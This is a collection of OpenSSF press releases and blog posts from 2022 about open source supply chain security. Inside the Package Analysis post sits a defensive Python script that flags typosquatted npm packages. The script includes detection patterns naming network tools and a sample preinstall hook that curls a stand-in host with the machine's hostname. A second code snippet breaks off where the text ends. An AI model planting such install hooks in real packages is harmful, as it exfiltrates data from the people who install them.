All Posts By

OpenSSF

The Linux Foundation and Open Source Software Security Foundation (OpenSSF) Gather Industry and Government Leaders for Open Source Software Security Summit II

By Press Release

10-Point Open Source and Software Supply Chain Security Mobilization Plan Released with Initial Pledges Surpassing $30M 

WASHINGTON, DC – May 12, 2022 – The Linux Foundation and the Open Source Software Security Foundation (OpenSSF) brought together over 90 executives from 37 companies and government leaders from the NSC, ONCD, CISA, NIST, DOE, and OMB to reach a consensus on key actions to take to improve the resiliency and security of open source software. 

Open Source Software Security Summit II is a follow-up to the first Summit, held January 13, 2022, which was led by the White House’s National Security Council. Today’s meeting was convened by the Linux Foundation and OpenSSF on the one-year anniversary of President Biden’s Executive Order on Improving the Nation’s Cybersecurity.

The Linux Foundation and OpenSSF, with input provided from all sectors, delivered a first-of-its-kind plan to broadly address open source and software supply chain security. The Summit II plan outlines approximately $150M of funding over two years to rapidly advance well-vetted solutions to the ten major problems the plan identifies. The 10 streams of investment include concrete action steps for both more immediate improvements and building strong foundations for a more secure future. 

A subset of participating organizations have come together to collectively pledge an initial tranche of funding towards implementation of the plan. Those companies are Amazon, Ericsson, Google, Intel, Microsoft, and VMware, pledging over $30M. As the plan evolves further, more funding will be identified, and work will begin as individual streams are agreed upon.

This builds on the existing investments that the OpenSSF community members make into open source software. An informal poll of our stakeholders indicates they spend over $110M and employ nearly a hundred full-time equivalent employees focused on nothing but securing the open source software landscape. This plan adds to those investments.

KEY QUOTES

Jim Zemlin – Executive Director, Linux Foundation:  “On the one year anniversary of President Biden’s executive order, today we are here to respond with a plan that is actionable, because open source is a critical component of our national security and it is fundamental to billions of dollars being invested in software innovation today. We have a shared obligation to upgrade our collective cybersecurity resilience and improve trust in software itself.  This plan represents our unified voice and our common call to action. The most important task ahead of us is leadership.”

Brian Behlendorf – Executive Director, Open Source Security Foundation (OpenSSF):  “What we are doing here together is converging a set of ideas and principles of what is broken out there and what we can do to fix it.  The plan we have put together represents the 10 flags in the ground as the base for getting started.  We are eager to get further input and commitments that move us from plan to action.”

Anne Neuberger, Deputy National Security Advisor, Cyber & Emerging Tech at National Security Council, The White House:

“President Biden signed the Executive Order on Cybersecurity last year to ensure the software our government relies on is secure and reliable, including software that runs our critical infrastructure. Earlier this year, the White House convened a meeting between government and industry participants to improve the security of Open Source software. The Open Source Security Foundation has followed up on the work at that meeting and convened participants from across industry to make substantial progress. We are appreciative of all participants’ work on this important issue.”

Atlassian

Adrian Ludwig, Chief Trust Officer

“Open source software is critical to so many of the tools and applications that are used by thousands of development teams worldwide. Consequently, the security of software supply chains has been elevated to the top of most organizations’ priorities in the wake of recent high-profile vulnerabilities in open source software. Only through concerted efforts by industry, government and other stakeholders can we ensure that open source innovation continues to flourish in a secure environment. This is why we are happy to be participating in OpenSSF, where we can collaborate on key initiatives that raise awareness and drive action around the crucial issues facing software supply chain security today. We’re excited to be a key contributor to driving meaningful change and we are optimistic about what we can achieve through our partnership with OpenSSF and like-minded organizations within its membership.”

Cisco

Eric Wenger, Senior Director, Technology Policy, Cisco Systems

“Open source software (OSS) is a foundational part of our modern computing infrastructure. As one of the largest users of and contributors to OSS, Cisco makes significant investments in time and resources to improve the security of widely-used OSS projects. Today’s effort shows the stakeholder community’s shared commitment to making open-source development more secure in ways that are measurable and repeatable.”

Dell

Jim Medica, Technologist in Dell Technologies’ Office of the CTO:

“Never before has software security been a more critical part of the global supply chain. Today, in a meeting led by Anne Neuberger, Deputy National Security Advisor for Cyber and Emerging Technology, Dell and my Open Source Security Foundation colleagues committed our software security expertise to execute the Open Source Software Security Mobilization Plan. Dell’s best and brightest engineers will engage with peers to develop risk-based metrics and scoring dashboards, digital signature methodologies for code signing, and Software Bill of Materials (SBoM) tools – all to address the grand challenge of open source software security. This is an excellent example of the leadership Dell provides to proactively impact software security and open-source security solutions, and reinforces our commitment to the open source software community, to our supply chain and to our national security.”

Ericsson

Per Beming, Head of Standard and Industry Initiatives

“Ericsson is one of the leading promoters and supporters of the open source ecosystem, accelerating the adoption and industry alignment in a number of key technology areas. The Open Source Security Foundation (OpenSSF) is an industry-wide initiative with the backing of the Linux Foundation with the objective of improving supply chain security in the open source ecosystem.

 “As a board member of OpenSSF, we are committed to open source security and we are fully supportive of the mobilization plan with the objective of improving supply chain security in the open source ecosystem. Being an advocate and adopter of global standards, the initiatives aim to strengthen open source security from a global perspective.”

GitHub

Mike Hanley, Chief Security Officer

“Securing the open source ecosystem starts with empowering developers and open source maintainers with tools and best practices that are instrumental to securing the software supply chain. As home to 83M developers around the world, GitHub is uniquely positioned and committed to advance these efforts, and we’ve continued our investments to help developers and maintainers realize improved security outcomes through initiatives including 2FA enforcement on GitHub.com and npm, open sourcing the GitHub Advisory Database, financial enablement for developers through GitHub Sponsors, and free security training through the GitHub Security Lab.

“The security of open source is critical to the security of all software. Summit II has been an important next step in bringing the private and public sector together again and we look forward to continuing our partnerships to make a significant impact on the future of software security.”

Google

Eric Brewer, VP of Infrastructure at Google Cloud & Google Fellow

“We’re thankful to the Linux Foundation and OpenSSF for convening the community today to discuss the open source software security challenges we’re facing and how we can work together across the public and private sectors to address them. Google is committed to supporting many of the efforts we discussed today, including the creation of our new Open Source Maintenance Crew, a team of Google engineers who will work closely with upstream maintainers on improving the security of critical open source projects, and by providing support to the community through updates on key projects like SLSA, Scorecards, and Sigstore, which is now being used by the Kubernetes project. Security risks will continue to span all software companies and open source projects and only an industry-wide commitment involving a global community of developers, governments and businesses can make real progress. Google will continue to play our part to make an impact.”

IBM

Jamie Thomas, Enterprise Security Executive

“Today, we had the opportunity to share our IBM Policy Lab’s recommendations on how understanding the software supply chain is key to improving security. We believe that providing greater visibility in the software supply chain through SBoMs (Software Bill of Materials) and using the Open Source Software community as a valuable resource to encourage passionate developers to create, hone their skills, and contribute to the public good can help strengthen our resiliency. It’s great to see the strong commitment from the community to work together to secure open source software. Security can always be strengthened and I would like to thank Anne Neuberger today for her deep commitment and open, constructive, technical dialogue that will help us pave the way to enhancing OSS security.”

Intel

Greg Lavender, Chief Technology Officer and General Manager of the Software and Advanced Technology Group

“Intel has long played a key role in contributing to open source. I’m excited about our role in the future building towards Pat’s Open Ecosystem vision. As we endeavor to live into our core developer tenets of openness, choice and trust – software security is at the heart of creating the innovation platforms of tomorrow.”

Melissa Evers, Vice President, Software and Advanced Technology, General Manager of Strategy to Execution

“Intel commends the Linux Foundation in their work advancing open source security. Intel has a history of leadership and investment in open source software and secure computing: over the last five years, Intel has invested over $250M in advancing open-source software security. As we approach the next phase of Open Ecosystem initiatives, we intend to maintain and grow this commitment by double digit percentages continuing to invest in software security technologies, as well as advance improved security and remediation practices within the community and among those who consume software from the community.”

JFrog

Stephen Chin, Vice President of Developer Relations

“While open source has always been seen as a seed for modernization, the recent rise of software supply chain attacks has demonstrated we need a more hardened process for validating open-source repositories. As we say at JFrog, ‘with great software comes great responsibility’, and we take that job seriously. As a designated CNA, the JFrog Security Research team constantly monitors open-source software repositories for malicious packages that may lead to widespread software supply chain attacks and alerts the community accordingly. Building on that, JFrog is proud to collaborate with the Linux Foundation and other OpenSSF members on designing a set of technologies, processes, accreditations, and policies to help protect our nation’s critical infrastructure while nurturing one of the core principles of open source – innovation.” 

JPMorgan Chase

Pat Opet, Chief Information Security Officer

“We are proud to have worked with Open Source Security Foundation (OpenSSF) and its members to create the new Open Source Software Security Mobilization Plan. This plan will help to address security issues in the software supply chain which is critical to making the world’s software safer and more secure for everyone.”

Microsoft

Mark Russinovich, CTO, Microsoft Azure

“Open source software is core to nearly every company’s technology strategy. Collaboration and investment across the open source ecosystem will strengthen and sustain security for everyone. Microsoft’s commitment to $5M in funding for OpenSSF supports critical cross-industry collaboration. We’re encouraged by the community, industry, and public sector collaboration at today’s summit and the benefit this will have to strengthen supply chain security.”

OWASP Foundation

Andrew van der Stock, Executive Director

“OWASP’s mission is to improve the state of software security around the world. We are contributing to the Developer Education and Certification, as well as addressing the Executive Order for improving the state and adoption of SBOMs. In particular, we would like to see a single, consumable standard across the board.”

Mark Curphey (founder of OWASP) and John Viega (author of the first book on software security), Stream Coordinators

“We’re excited to see the industry’s willingness to come together on a single ‘bill of materials’ format. It has the potential to help the entire industry solve many important problems, including drastically improving response speed for when major new issues in open source software emerge.” 

SAP

Tim McKnight, SAP Executive Vice President & Chief Information Security Officer

“SAP is proud to be a part of the Open Source Software Security Summit II and contribute to the important dialogue on the topic of Open Source software security.

“SAP is firmly committed to supporting the execution of the Open Source Software Security Mobilization Plan and we look forward to continuing our collaboration with our government, industry, and academic partners.”

Sonatype

Brian Fox, CTO of Sonatype and stewards of Maven Central.

“It’s rare to see vendors, competitors, government, and diverse open source ecosystems all come together like they have today. It shows how massive a problem we have to solve in securing open source, and highlights that no one entity can solve it alone. The Open Source Software Security Mobilization Plan is a great step toward bringing our community together with a number of key tactics, starting with securing OSS production, which will make the entire open source ecosystem stronger and safer.” 

Wipro

Andrew Aitken, Global Head of Open Source

“Wipro is committed to helping ensure the safety of the software supply chain through its engagement with OpenSSF and other industry initiatives and is ideally suited to enhance efforts to provide innovative tooling, secure coding best practices and industry and government advocacy to improve vulnerability remediation.

“As the only global systems integrator in the OpenSSF ecosystem and in line with its support of OpenSSF objectives, Wipro will commit to training 100 of its cybersecurity experts to the level of trainer status in LF and OpenSSF secure coding best practices and to host training workshops with its premier global clients and their developer and cybersecurity teams.

“Further, Wipro will increase its public contributions to Sigstore and the SLSA framework by integrating them into its own solutions and building a community of 50+ contributors to these critical projects.”

KEY BACKGROUND

Three Goals of the 10-Point Plan

  1. Securing Open Source Security Production
    1. Make baseline secure software development education and certification the new normal for pro OSS developers
    2. Establish a public, vendor-neutral, objective-metrics based risk assessment dashboard for the top 10,000 open source components.
    3. Accelerate the adoption of digital signatures on software releases
    4. Eliminate root causes of many vulnerabilities through replacement of non-memory-safe languages.
  2. Improving Vulnerability Discovery and Remediation
    1. Accelerate discovery of new vulnerabilities by maintainers and experts.
    2. Establish the corps of “volunteer firefighter” security experts to assist open source projects during critical times.
    3. Conduct third-party code reviews (and any necessary remediation work) of 200 of the most-critical open source software components yearly
    4. Coordinate industry-wide data sharing to improve the research that helps determine the most critical open source software.
  3. Shorten ecosystem Patching Response Time
    1. Software Bill of Materials (SBOM) Everywhere – improve SBOM tooling and training to drive adoption
    2. Enhance the 10 most critical open source security build systems, package managers, and distribution systems with better supply chain security tools and best practices.

The 10-Point Plan Summarized (available in full here)

  1. Security Education: Deliver baseline secure software development education and certification to all.
  2. Risk Assessment: Establish a public, vendor-neutral, objective-metrics-based risk assessment dashboard for the top 10,000 (or more) OSS components.
  3. Digital Signatures: Accelerate the adoption of digital signatures on software releases.
  4. Memory Safety: Eliminate root causes of many vulnerabilities through replacement of non-memory-safe languages.
  5. Incident Response: Establish the OpenSSF Open Source Security Incident Response Team, security experts who can step in to assist open source projects during critical times when responding to a vulnerability.
  6. Better Scanning: Accelerate discovery of new vulnerabilities by maintainers and experts through advanced security tools and expert guidance.
  7. Code Audits: Conduct third-party code reviews (and any necessary remediation work) of up to 200 of the most-critical OSS components once per year.
  8. Data Sharing: Coordinate industry-wide data sharing to improve the research that helps determine the most critical OSS components.
  9. SBOMs Everywhere: Improve SBOM tooling and training to drive adoption.
  10. Improved Supply Chains: Enhance the 10 most critical OSS build systems, package managers, and distribution systems with better supply chain security tools and best practices.

Media Contact
Edward Cooper
openssf@babelpr.com

Testimony to the US House Committee on Science and Technology

By Blog

We’re pleased to share that Brian Behlendorf, OpenSSF General Manager, testified to the United States House of Representatives Committee on Science, Space, and Technology today. Brian’s testimony shares the work being done within the Open Source Security Foundation and broader open source software community to improve security and trustworthiness of open source software.

A copy of Brian’s written remarks is linked here.

OpenSSF Announces 15 New Members To Further Strengthen Open Source Software Supply Chain Security

By Press Release

Expands core working groups ahead of OpenSSF Day

SAN FRANCISCO, May 9, 2022 – The Open Source Security Foundation (OpenSSF), a cross-industry organization hosted at the Linux Foundation that brings together the world’s most important software supply chain security initiatives, today announced 15 new members from leading software development, cybersecurity, financial services, communications, and academic sectors.

This round of commitments is led by two new premier members, Atlassian and Sonatype, who will join the OpenSSF governing board. New general member commitments come from Arnica, Bloomberg, Comcast, Cycode, F5, Futurewei Technologies, Legit Security, Sectrend, SUSE, and Tenable.

“We are thrilled to welcome Atlassian and Sonatype, two companies who play critical roles in modern software development and security, to the OpenSSF governing board,” said Brian Behlendorf, General Manager at OpenSSF. “Open source software supply chain attacks threaten the very foundations of innovation that billions of people rely upon. Our 15 new members join a growing community of organizations, developers, researchers, and security professionals that are investing time and resources required to respond in this constantly evolving threat landscape.”

Open source software has become the foundation on which our digital economy is built. As noted in the Linux Foundation’s 2022 Software Bill of Materials (SBOM) and Cybersecurity Readiness report, 98% of organizations use open source regularly. The same study revealed that 72% of organizations are very or extremely concerned about software security. Recent vulnerabilities, such as the one impacting Log4j, have caused many organizations to prioritize software supply chain security and realize the need to be fully abreast of the open source ecosystem, as well as contributing to it. From governments to businesses, open source security has been brought to the top of the agenda as a priority issue to address and as a result, OpenSSF is seeing membership rise at a rapid pace.

The latest commitments follow a productive period for OpenSSF in which the foundation expanded its core working groups to include Securing Software Repositories. This group aims to improve cybersecurity practices where developers download open source packages most often. 

Furthermore, on June 20th, the foundation will host a full day of sessions at OpenSSF Day. Presentations, delivered by working group leaders, will include subjects such as Best Practice Badges and Other Good Practices, Three Things Your Open Source Project Must Consider, and Securing Critical Projects. The day will conclude with a panel discussion on the Future of Securing Open Source Software. Registration and attendance are free for all those attending the Open Source Summit conference.

Premier Member Quotes

Atlassian

“Open source software is critical to so many of the tools and applications that are used by thousands of development teams worldwide. Consequently, the security of software supply chains has been elevated to the top of most organizations’ priorities in the wake of recent high-profile vulnerabilities in open source software. Only through concerted efforts by industry, government and other stakeholders can we ensure that open source innovation continues to flourish in a secure environment. This is why we are happy to be joining OpenSSF, where we can collaborate on key initiatives that raise awareness and drive action around the crucial issues facing software supply chain security today. As a premier member, we’re excited to be a key contributor to driving meaningful change and we are optimistic about what we can achieve through our partnership with OpenSSF and like-minded organizations within its membership.” – Adrian Ludwig, Chief Trust Officer, Atlassian

Sonatype

“As the maintainers of the largest repository of open source components in Maven Central, we have a unique view into how great the demand for open source has become in recent years. However, as that demand has grown, bad actors have recognized the power of open source and are seeking to use that against the industry. As these software supply chain attacks become more commonplace, open source developers have become the frontline of this battle. Our key mission at Sonatype is to help people understand their software supply chain, and harness all of the good that open source has to offer, without any of the risk. OpenSSF and its members share a similar vision. I’m excited to play a bigger role in OpenSSF as a board member and collectively work with other members to keep open source ecosystems safe and secure, as we all figure out how to battle both new and old attacks on the community.” – Brian Fox, CTO and Co-founder, Sonatype

General Member Quotes

Arnica

“Software supply chain attack vectors have consistently caught the security community off-guard. Based on Arnica’s research across all attacks since 2018, we found two consistent root causes. One, improper access management to source code and two, inability to detect abnormal behavior in the developer toolset. The journey to solve these gaps is long and we are working on perfecting each risk mitigation strategy one-by-one, starting with introducing the first-ever self-service access management for GitHub.” – Nir Valtman, Co-Founder and CEO, Arnica

Bloomberg

“We are incredibly excited to join the Open Source Security Foundation (OpenSSF), whose values of public good, openness and transparency, and diversity, inclusion, and representation, align with those of Bloomberg. As an ‘Open Source First’ organization, we greatly value open source and its use within the finance sector, and we are fully committed to helping secure the open source software supply chain, something we have invested in via an ongoing collaboration between our CTO Office and Engineering organization.” – Gavin McNay, Security Architect in Bloomberg’s CTO Office

Comcast

“Comcast is committed to open source software. We use it to build products, attract talent, and develop our technology to improve the customer experience. When it comes to open source security, everyone plays a role. We are thrilled to join OpenSSF with the global open-source community to see how we can continue to evolve to make open-source development even more secure.” – Shilla Saebi, Open Source Program Office Lead, Comcast Cable

F5

“The growth of open source usage has magnified the importance of advancing OSS supply chain security for all, which can only be achieved as a shared priority among the industry. At F5, we are committed to ensuring our customers’ apps are fast, available and secure in any environment. That is why we value the work of the Open Source Security Foundation and its participating members, and look forward to sharing our domain expertise to help advance this important work.” – Geng Lin, EVP and Chief Technology Officer, F5

Futurewei Technologies

“OpenSSF is a premier and leading organization on open source security. Futurewei is very excited to join OpenSSF, and to engage in the conversations on the important topics of open source security and sustainability. We look forward to exciting discussions and collaborations with OpenSSF.” – Chris Xie, Head of Open Source Strategy and Business Development 

Legit Security

“Legit Security is pleased to join OpenSSF to advance the security of software supply chains within the open-source ecosystem as well as giving organizations tools to secure the infrastructure that makes up the SDLC – such as pipelines and systems. Attacks on software supply chains are estimated to increase between three to six times per year and are a global threat. We look forward to working with OpenSSF to publish security research and contribute tools and code for more secure software delivery and consumption across the entire community.” – Liav Caspi, CTO of Legit Security

Sectrend

“We feel very excited to be a part of this industry-leading Open Source Security foundation (OpenSSF). Together with other top-notch peers around the globe in various sectors under this initiative, we, Sectrend, are aiming to assist organizations of any size address the security and license compliance risks from open-source software. Securing the software supply chain is very critical for every company. Within the framework of OpenSSF or the Linux Foundation, Sectrend will make a tremendous contribution to this community-driven process in tooling, training, research, best practices, and consulting. Beyond Security, More than Open Source.” – Alex Xue, CEO, Sectrend

SUSE

“According to recent research in an Economist Impact survey, 95% of organizations are practicing open innovation, demonstrating how open source software is critical to business’s infrastructure and applications. With this comes the need for software to be secure and is why SUSE takes a proactive stance against security and compliance risks, leveraging tools for full lifecycle security including vulnerability management, CI/CD pipeline security, run-time security and government security certifications. SUSE is joining OpenSSF to further collaborate with the efforts to ensure the security of the open source software supply chain.” – Brent Schroeder, Head of SUSE’s Office of the CTO

Tenable

“We’re proud to be part of OpenSSF and join so many industry peers who understand the critical importance of securing open-source software and its associated supply chain. Log4j showed the world how pervasive OSS use is and how vulnerable it can be if the proper development and controls are not put in place to protect it. Tenable’s commitment to increasing visibility in attack surfaces includes shifting left to secure software development and helping organizations understand where the risks are throughout their systems.” – Glen Pendley, CTO, Tenable

The foundation also announced new Associate Members, including the Eclipse Foundation, China Academy of Information and Communications Technology (CAICT) and Chinese Academy of Sciences (ISCAS). 

Additional Resources

  • View the complete list of the OpenSSF members
  • Attend OpenSSF Day at the Linux Foundation’s Open Source Summit on June 20 
  • Contribute efforts to one or more of the active OpenSSF working groups
  • Read the OpenSSF and Harvard’s Census II Report, shedding light on the most commonly used FOSS packages at the application library level

About OpenSSF

Hosted by the Linux Foundation, the OpenSSF (launched in August 2020) is a cross-industry organization that brings together the industry’s most important open source security initiatives and the individuals and companies that support them. It combines the Linux Foundation’s Core Infrastructure Initiative (CII), founded in response to the 2014 Heartbleed bug, and the Open Source Security Coalition, founded by the GitHub Security Lab to build a community to support open source security for decades to come. The OpenSSF is committed to collaboration and working both upstream and with existing communities to advance open source security for all. For more information, please visit: https://openssf.org/

About the Linux Foundation

Founded in 2000, the Linux Foundation and its projects are supported by more than 1,800 members. The Linux Foundation is the world’s leading home for collaboration on open source software, open standards, open data, and open hardware. Linux Foundation’s projects are critical to the world’s infrastructure, including Linux, Kubernetes, ONAP, Node.js, Hyperledger, RISC-V, and more. The Linux Foundation’s methodology focuses on leveraging best practices and addressing the needs of contributors, users, and solution providers to create sustainable models for open collaboration. For more information, please visit us at: linuxfoundation.org

Media Contacts

Babel for OpenSSF

openssf@babelpr.com

Introducing Package Analysis: Scanning open source packages for malicious behavior

By Blog

By Caleb Brown and David A. Wheeler, on behalf of Securing Critical Projects Working Group

Today we’re pleased to announce the initial prototype version of the Package Analysis project, an OpenSSF project addressing the challenge of identifying malicious packages in popular open source repositories. In just one month of analysis, the project identified more than 200 malicious packages uploaded to PyPI and npm. 

The Package Analysis project seeks to understand the behavior and capabilities of packages available on open source repositories: what files do they access, what addresses do they connect to, and what commands do they run? The project also tracks changes in how packages behave over time, to identify when previously safe software begins acting suspiciously. This effort is meant to improve the security of open source software by detecting malicious behavior, informing consumers selecting packages, and providing researchers with data about the ecosystem. Though the project has been in development for a while, it has only recently become useful following extensive modifications based on initial experiences.

The vast majority of the malicious packages we detected are dependency confusion and typosquatting attacks. The packages we found usually contain a simple script that runs during an install and calls home with a few details about the host. These packages are most likely the work of security researchers looking for bug bounties, since most are not exfiltrating meaningful data except the name of the machine or a username, and they make no attempt to disguise their behavior. Still, any one of these packages could have done far more to hurt the unfortunate victims who installed them, so Package Analysis provides a countermeasure to these kinds of attacks.
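The two signals described above (a name that imitates a popular package, and an install-time script that contacts a remote host with host details) can be triaged statically from an npm manifest. The sketch below is an added example, not code from the Package Analysis project, which observes behavior dynamically; the popular-name list, regex patterns, function names and both sample manifests are constructed assumptions.

```python
import json
import re

# Constructed stand-in for a registry's list of heavily used package names.
POPULAR = {"axios", "chalk", "express", "lodash", "react"}

# npm lifecycle hooks that run automatically during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# Heuristic patterns (assumptions): contacting a remote host, reading host details.
NETWORK = re.compile(r"\b(curl|wget|nslookup|dig|nc)\b|https?://", re.I)
HOST_INFO = re.compile(r"\b(hostname|whoami|uname)\b|\$\{?(USER|USERNAME)\b", re.I)


def edit_distance(a, b):
    """Optimal string alignment distance: insert, delete, substitute, transpose."""
    prev2, prev = None, list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cost = 0 if ca == cb else 1
            best = min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + cost)
            # Adjacent transposition ("lodahs" for "lodash") counts as one edit.
            if prev2 is not None and j > 1 and ca == b[j - 2] and a[i - 2] == cb:
                best = min(best, prev2[j - 2] + 1)
            cur.append(best)
        prev2, prev = prev, cur
    return prev[-1]


def lookalike_of(name, popular=POPULAR, max_distance=1):
    """Return the popular package that `name` nearly matches, or None."""
    lowered = name.lower()
    if lowered in popular:
        return None  # it is the popular package itself
    squashed = re.sub(r"[-_.]", "", lowered)  # "lo-dash" imitates "lodash" too
    for known in sorted(popular):
        if edit_distance(squashed, known) <= max_distance:
            return known
    return None


def triage_manifest(package_json_text):
    """Return (kind, detail) findings for one package.json document."""
    manifest = json.loads(package_json_text)
    findings = []
    name = manifest.get("name", "")
    target = lookalike_of(name)
    if target:
        findings.append(("lookalike-name", f"{name!r} resembles {target!r}"))
    scripts = manifest.get("scripts") or {}
    for hook in INSTALL_HOOKS:
        command = scripts.get(hook)
        if not isinstance(command, str):
            continue
        if NETWORK.search(command):
            findings.append(("install-network", f"{hook}: {command}"))
        if HOST_INFO.search(command):
            findings.append(("install-host-info", f"{hook}: {command}"))
    return findings


# Constructed manifests for illustration; the host name uses the reserved
# .invalid TLD and does not resolve.
SAMPLE_SUSPECT = """{
  "name": "lodahs",
  "version": "1.0.0",
  "scripts": {
    "preinstall": "curl https://collector.example.invalid/$(hostname)",
    "test": "node test.js"
  }
}"""

SAMPLE_BENIGN = """{
  "name": "left-pad-utils",
  "version": "2.3.1",
  "scripts": {
    "postinstall": "node scripts/build.js",
    "test": "jest"
  }
}"""

if __name__ == "__main__":
    for label, text in (("suspect", SAMPLE_SUSPECT), ("benign", SAMPLE_BENIGN)):
        print(label, triage_manifest(text))
```

These are triage signals, not verdicts: a one-edit name match also fires on legitimate neighbors, and dependency confusion cannot be seen from a manifest alone because it depends on the consumer's private package names.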

There are lots of opportunities for involvement with this project, and we welcome anyone interested in contributing to the future goals of:

  • detecting differences in package behavior over time;
  • automating the processing of the Package Analysis results;
  • storing the packages themselves as they are processed for long-term analysis; 
  • and improving the reliability of the pipeline.

Check out our GitHub Project and Milestones for more opportunities, and feel free to get involved on the OpenSSF Slack. This project is one of the efforts of the OpenSSF Securing Critical Projects Working Group. You can also explore other OpenSSF projects like SLSA and Sigstore, which expand beyond the security of packages themselves to address package integrity across the supply chain.

Your Favorite Software Repositories, Now Working Together

Authors: Dustin Ingram (Google), Jacques Chester (Shopify)

A software repository is a critical component of any open source ecosystem: it provides a trusted central channel to publish, store and distribute open-source third-party software to all consumers. Package indexes and package managers exist for almost every software ecosystem, and share many of the same goals, features and threats.

But these repositories and related tooling have been developed independently, with little knowledge sharing between them over the years. This means the same problems get solved repeatedly, mostly in isolation. As it becomes more important to increase the overall security of these critical repositories, it has also become important for these repositories to collaborate and share knowledge.

Today, we’re announcing the creation of the Securing Software Repositories Working Group, a community collaboration with a focus on the maintainers of software repositories, software registries, and tools (like package managers) that rely on them, at various levels including system, language, plugin, extensions and container systems.

We’ve brought together many of the key maintainers, contributors and stakeholders of software repositories that are critical to many open source ecosystems, including Java, Node.js, Ruby, Rust, PHP, and Python, to participate in the group.

This working group provides a forum to share experiences and to discuss shared problems, risks and threats. It also provides a collaborative environment for aligning on the introduction of new tools and technologies to strengthen and secure our respective software repositories, such as Sigstore.

You can learn more about the working group’s objectives in our repository and charter, join our meetings via the public OSSF calendar, or find us on the OpenSSF Slack in the #securing_software_repos channel. If you maintain or operate a software repository system of any kind, please join in!

Free Developing Secure Software Training Course From OpenSSF Now Available

Log4Shell, SolarWinds Compromise, Heartbleed – cybersecurity breaches have become household names in recent years. These issues are costing organizations billions of dollars in prevention and remediation costs, yet at the same time they are becoming ever more common. Reacting to breaches after the fact is useful, but not enough; such reactions fail to protect users in the first place. Security needs to instead be baked into software before it’s released. Unfortunately, most software developers don’t know how to do this.

To alleviate this issue and improve access to cybersecurity training for everyone from developers to operations teams to end users, the Open Source Security Foundation (OpenSSF) has partnered with Linux Foundation Training & Certification to release a new, free, online training course, Developing Secure Software. Those who complete the course and pass the final exam will earn a certificate of completion valid for two years.

Geared towards software developers, DevOps professionals, software engineers, web application developers, and others interested in learning how to develop secure software, this course focuses on practical steps that can be taken, even with limited resources, to improve information security. The goal is to make it easier to create and maintain systems that are much harder to successfully attack, reduce the damage when attacks are successful, and speed the response so that any latent vulnerabilities can be rapidly repaired.

This course starts by discussing the basics of cybersecurity, such as what risk management really means. It discusses how to consider security as part of the requirements of a system, and what potential security requirements you might consider. It then focuses on how to design software to be secure, including various secure design principles that will help you avoid bad designs and embrace good ones. It also considers how to secure your software supply chain, that is, how to more securely select and acquire reused software (including open source software) to enhance security. 

The course also focuses on key implementation issues and practical steps that you can take to counter the most common kinds of attacks. Discussion follows on how to verify software for security, including various static and dynamic analysis approaches, as well as how to apply them (e.g., in a continuous integration pipeline). It also discusses more specialized topics, such as the basics of how to develop a threat model and how to apply various cryptographic capabilities. The course content mirrors that in the Secure Software Development program we offer with edX, but in a single course instead of three.

The self-paced course can be completed in about 14-18 hours and includes quizzes to test the knowledge gained. Upon completion, participants will receive a digital badge verifying that they have been successful in all required coursework and have learned the material. This digital badge can be added to resumes and social media profiles. 

Enroll today to start improving your cybersecurity skills and practices!

Open Source Security Foundation Attracts New Commitments, Advances Key Initiatives in Weeks Since White House Security Summit

SAN FRANCISCO, March 1, 2022 – The Open Source Security Foundation (OpenSSF), a cross-industry organization hosted at the Linux Foundation that brings together the world’s most important open source security initiatives, today announced that 20 new organizations have joined OpenSSF to help identify and fix security vulnerabilities in open source software and develop improved tooling, training, research, best practices, and vulnerability disclosure practices. It is also announcing the latest milestones achieved across a variety of its technical initiatives. Together these underscore the cross-industry momentum that has built as awareness has increased in the wake of recent security incidents, the recent White House Open Source Security Summit, and recent Congressional hearings.

“The time is now for this community to make real progress on software security. Since open source is the foundation on which all software is built, the work we do at OpenSSF with contributions from companies and individuals from around the world is fundamental to that progress,” said Brian Behlendorf, executive director at OpenSSF. “We’ve never had more support or focus on building, sustaining, and securing the software that underpins all of our lives, and we’re happy to be the neutral forum where this can happen.” 

New Premier Member commitments come from 1Password, Citi, Coinbase, Huawei Technologies, JFrog, and Wipro. New General Member commitments come from Accuknox, Alibaba Cloud, Block, Inc, Blockchain Technology Partners, Catena Cyber, Chainguard, Cloudsmith, DeployHub, MongoDB, NCC Group, ReversingLabs, Spotify, Teleport, and Wingtecher Technology. New Associate Members include MITRE and OpenUK. For a complete review of the OpenSSF member roster, please visit: https://openssf.org/about/members/

These commitments come on the heels of the recent White House Open Source Security Summit, where the Linux Foundation and OpenSSF represented hundreds of its project communities and discussed how best to support software security and open source security posture going forward. This summit was a major milestone in the Linux Foundation’s engagement with the public sector and underscored its position supporting not only the projects it hosts but all of the world’s most critical open source infrastructure. 

Since the OpenSSF announced initial commitments in October, the community has continued to advance the OpenSSF mission. Some selected highlights include:

New Alpha-Omega Project Launches with $5m Investment to Improve OSS Security Posture

OpenSSF also recently announced the Alpha-Omega Project to improve the security posture of open source software (OSS) through direct engagement of software security experts and automated security testing. It is initially supported by Microsoft and Google with a combined investment of $5 million. The Project improves global OSS supply chain security by working with project maintainers to systematically look for new, as-yet-undiscovered vulnerabilities in open source code and get them fixed. “Alpha” will work with the maintainers of the most critical open source projects to help them identify and fix security vulnerabilities and improve their security posture. “Omega” will identify at least 10,000 widely deployed OSS projects where it can apply automated security analysis, scoring, and remediation guidance to their open source maintainer communities.

Automated Security Tool, Scorecards, Increases Scans from 50,000 to 1 Million Projects

Scorecards is an OpenSSF project that helps open source users understand the risks of the dependencies they consume. OpenSSF members GitHub and Google recently announced Scorecards v4, which includes Scorecards GitHub Workflow Action to automate the identification of how changes to a project affected its security. It also includes License Check to detect the presence of a project license and Dangerous-Workflow check to detect dangerous usage of the pull_request_target trigger and risks of script injections in GitHub workflows. The Scorecards project has also increased the scale of scans from 50,000 projects to one million projects. These software projects are identified as most critical based on their number of direct dependencies, giving a more detailed view of the ecosystem and strengthening supply chain security as users see improved coverage of their dependencies. 
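The two patterns the Dangerous-Workflow check is described as covering can be illustrated with a simplified text scan of a workflow file. This is an added example, not Scorecards’ own implementation; the regexes, function names and both sample workflows are constructed, and the scan is a line-based heuristic rather than a full YAML parse.

```python
import re

# GitHub context values whose content a pull request or issue author controls.
UNTRUSTED_CONTEXT = re.compile(
    r"\$\{\{\s*github\.(?:head_ref|event\.(?:"
    r"issue\.(?:title|body)|comment\.body|review\.body|head_commit\.message|"
    r"pull_request\.(?:title|body|head\.ref|head\.label)))\s*\}\}"
)
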